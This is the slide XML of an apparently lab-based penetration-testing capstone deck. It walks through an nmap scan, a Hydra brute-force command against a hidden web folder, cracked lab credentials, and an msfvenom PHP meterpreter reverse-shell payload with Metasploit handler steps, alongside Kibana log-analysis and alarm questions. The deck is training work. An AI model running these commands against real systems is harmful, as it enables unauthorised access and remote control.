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oboto Thin"/>
      <p:regular r:id="rId30"/>
      <p:bold r:id="rId31"/>
      <p:italic r:id="rId32"/>
      <p:boldItalic r:id="rId33"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId34"/>
      <p:boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium"/>
      <p:regular r:id="rId36"/>
      <p:bold r:id="rId37"/>
      <p:italic r:id="rId38"/>
      <p:boldItalic r:id="rId39"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId40"/>
      <p:bold r:id="rId41"/>
      <p:italic r:id="rId42"/>
      <p:boldItalic r:id="rId43"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light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683A3E9-082F-4E23-9D83-9CAF5A91C16E}">
  <a:tblStyle styleId="{2683A3E9-082F-4E23-9D83-9CAF5A91C1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RobotoLight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RobotoLight-italic.fntdata"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLigh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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight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bold.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-regular.fntdata"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-italic.fntdata"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-boldItalic.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold.fntdata"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-bold.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-regular.fntdata"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-boldItalic.fntdata"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium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1142748a68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1142748a68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Google Shape;1234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3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9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30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Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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35.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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46.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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50.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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image" Target="../media/image45.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58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png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61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7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63.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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3.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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77.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89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2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image105.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104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9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image106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[“Brute Force” Attack]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1133" name="Google Shape;1133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Kali Linux login cracker “Hydra” was used specifically for this brute force attack.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6" name="Google Shape;1136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7" name="Google Shape;1137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8" name="Google Shape;1138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9" name="Google Shape;1139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40" name="Google Shape;1140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1" name="Google Shape;1141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2" name="Google Shape;1142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username (ashton) and its accompanying password (leopoldo) were cracked/found using “Hydra”.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4" name="Google Shape;1144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5" name="Google Shape;1145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6" name="Google Shape;1146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7" name="Google Shape;1147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63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ydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder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[PHP Reverse Shell Payload with Metasploit]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1154" name="Google Shape;1154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64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64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 PHP script and Metasploit via Kali Linux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57" name="Google Shape;1157;p64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58" name="Google Shape;1158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9" name="Google Shape;1159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0" name="Google Shape;1160;p64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61" name="Google Shape;1161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2" name="Google Shape;1162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3" name="Google Shape;1163;p64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64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 shell was able to properly set up on the target machine. And with this crucial connection having been made, we thus were able to navigate to the (/) directory and “capture the flag” via the file appropriately named (flag.txt).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65" name="Google Shape;1165;p64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66" name="Google Shape;1166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7" name="Google Shape;1167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8" name="Google Shape;1168;p64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64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msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 &gt;&gt; shell.php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sfconsole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exploit/multi/handler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et payload php/meterpreter/reverse_tcp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4" name="Google Shape;1174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65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76" name="Google Shape;1176;p6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82" name="Google Shape;1182;p66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83" name="Google Shape;1183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66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port scan.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5" name="Google Shape;1185;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712025" y="675975"/>
            <a:ext cx="49110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port scan occur?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packets were sent, and from which IP?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indicates that this was a port scan?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1186" name="Google Shape;118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2" name="Google Shape;1192;p67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93" name="Google Shape;1193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67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request for the hidden directory.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5" name="Google Shape;1195;p67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request occur? How many requests were made?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 What did they contain?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1196" name="Google Shape;119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02" name="Google Shape;1202;p68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03" name="Google Shape;1203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68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brute force attack.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5" name="Google Shape;1205;p68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in the attack?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had been made before the attacker </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>discovered the password?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1206" name="Google Shape;120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12" name="Google Shape;1212;p69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13" name="Google Shape;1213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69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Add a screenshot of Kibana logs depicting the WebDAV connection.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5" name="Google Shape;1215;p69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to this directory?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</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1216" name="Google Shape;121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1" name="Google Shape;1221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70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23" name="Google Shape;1223;p7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29" name="Google Shape;1229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71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threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1231" name="Google Shape;1231;p7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37" name="Google Shape;1237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72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39" name="Google Shape;1239;p7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45" name="Google Shape;1245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73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47" name="Google Shape;1247;p7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53" name="Google Shape;1253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74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55" name="Google Shape;1255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61" name="Google Shape;1261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75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63" name="Google Shape;1263;p75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2" type="body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 192.168.1.0/24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 255.255.255.0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Windows 10 Pro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Gateway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ELK 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Capstone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Kali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1" name="Google Shape;106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034348"/>
            <a:ext cx="6168349" cy="364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8" name="Google Shape;1068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9" name="Google Shape;1069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5" name="Google Shape;1075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6" name="Google Shape;1076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7" name="Google Shape;1077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{2683A3E9-082F-4E23-9D83-9CAF5A91C16E}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Gateway</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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b="1"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Hyper-V Manager</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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 Server</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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b="1"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Logging and Monitoring</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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b="1"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b="1"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 Machine</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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 Linux</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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b="1"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Penetration Testing</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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3" name="Google Shape;1083;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5997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4" name="Google Shape;1084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5" name="Google Shape;1085;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="479550" y="1049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{2683A3E9-082F-4E23-9D83-9CAF5A91C16E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="27751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sng"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 80 is Open</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200" u="sng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port can be accessed with no username(s) and password(s) necessary.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Documents/Files (which may or may not be sensitive) are made openly vulnerable for the taking.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sng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Weak/poor nomenclature for files, folders/directories and username(s)/password(s)</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200" u="sng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sng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There is a directory/folder named “secret_folder”. The username(s) (ashton) and (ryan) and their respective password(s) (leopoldo) and (linux4u).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Due to such on the nose nomenclature (secret_folder), it makes exploitation that much easier. The username(s) and password(s) are not complex at all.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sng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“Brute Force” Attack</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200" u="sng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 “Brute Force” attack can be performed using the Kali Linux login cracker called “Hydra”.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Due to the simplicity of the username (ashton) and password (leopoldo), the “Brute Force” attack was accomplished with ease.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sng">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>PHP Reverse Shell Payload with Metasploit</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200" u="sng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PHP script that is configured according to the LHOST/LPORT that is being targeted used with the Metasploit framework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 conjunction with Metasploit, a shell is set up on the target machine.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[Port 80 is Open]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1091" name="Google Shape;1091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Using NMAP, I was able to see that port 80 was open after it returned a list of 4 hosts that were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available.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4" name="Google Shape;1094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5" name="Google Shape;1095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6" name="Google Shape;1096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7" name="Google Shape;1097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8" name="Google Shape;1098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9" name="Google Shape;1099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0" name="Google Shape;1100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NMAP was able to scan 256 IP addresses (including the 4 hosts) in only 6.20 seconds).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2" name="Google Shape;1102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3" name="Google Shape;1103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4" name="Google Shape;1104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5" name="Google Shape;1105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61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nmap 192.1.168.1.105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[Weak/Poor Nomenclature]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112" name="Google Shape;1112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Kali Linux login cracker “Hydra” and the website “crackstation.net” were both used to ultimately find the credentials for the users (ashton) and (ryan).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5" name="Google Shape;1115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6" name="Google Shape;1116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7" name="Google Shape;1117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8" name="Google Shape;1118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9" name="Google Shape;1119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0" name="Google Shape;1120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1" name="Google Shape;1121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Due to the simplicity and non-difficulty of the username(s) and password(s) used, as well as having a folder literally named “secret_folder”, exploitation of this targeting machine was made simple.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3" name="Google Shape;1123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4" name="Google Shape;1124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5" name="Google Shape;1125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6" name="Google Shape;1126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62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shton: leopoldo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yan: linux4u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/company_folders/secret_folder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